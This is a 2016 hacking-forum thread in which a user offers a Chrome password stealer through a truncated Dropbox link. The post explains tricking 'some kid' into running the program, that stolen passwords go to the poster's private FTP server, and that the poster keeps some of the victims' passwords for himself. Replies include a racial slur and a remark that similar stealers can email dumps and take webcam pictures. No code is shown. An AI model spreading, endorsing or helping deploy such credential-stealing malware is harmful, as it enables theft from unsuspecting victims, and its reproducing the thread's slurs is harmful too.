Chrome Password Stealer
by SenpaiNig - June 02, 2016 at 05:12 AM
Alright.... so its a password stealer
Heres how it works:
you trick some kid into clicking and opening the program
At the end of the program it gives a 4 digit Number REMEMBER IT...
Passwords are sent too my private Ftp server where i hold them
Pm me your 4 digit code and i give you the file....

One thing too remember I will take 4-5 passwords of my choice from the dump and keep them for my own desires and then delete those passwords off the list...  if im giving you a program i might aswell get a cut eh?... 

Remember:
Dont open the program yourself... if you do give me the 4 digit code and then tell me you did it by accident i will delete immediatly
no 4 digit code no passwords simple as that....

Download link for the password stealer:
https://www.dropbox.com/s/3vvce0bcce673s...r.zip?dl=0
Links to malware pwn the nigger.
seems useful for everything
Shit like this is widely available and doesn't need any FTP support. There are a few that dump all the account info to your email of choice and some that run through your own connection and feed you info through the program itself. There are some that even go as far as to take pictures every few minutes or so. You taking cut from people here is sad, getting people to get to do your dirty a disgrace. NYPA.
(June 02, 2016 at 05:12 AM)SenpaiNig Wrote: Alright.... so its a password stealer
Heres how it works:
you trick some kid into clicking and opening the program
At the end of the program it gives a 4 digit Number REMEMBER IT...
Passwords are sent too my private Ftp server where i hold them
Pm me your 4 digit code and i give you the file....

One thing too remember I will take 4-5 passwords of my choice from the dump and keep them for my own desires and then delete those passwords off the list...  if im giving you a program i might aswell get a cut eh?... 

Remember:
Dont open the program yourself... if you do give me the 4 digit code and then tell me you did it by accident i will delete immediatly
no 4 digit code no passwords simple as that....

Download link for the password stealer:
https://www.dropbox.com/s/3vvce0bcce673s...r.zip?dl=0
thank you ..... for sharing Smile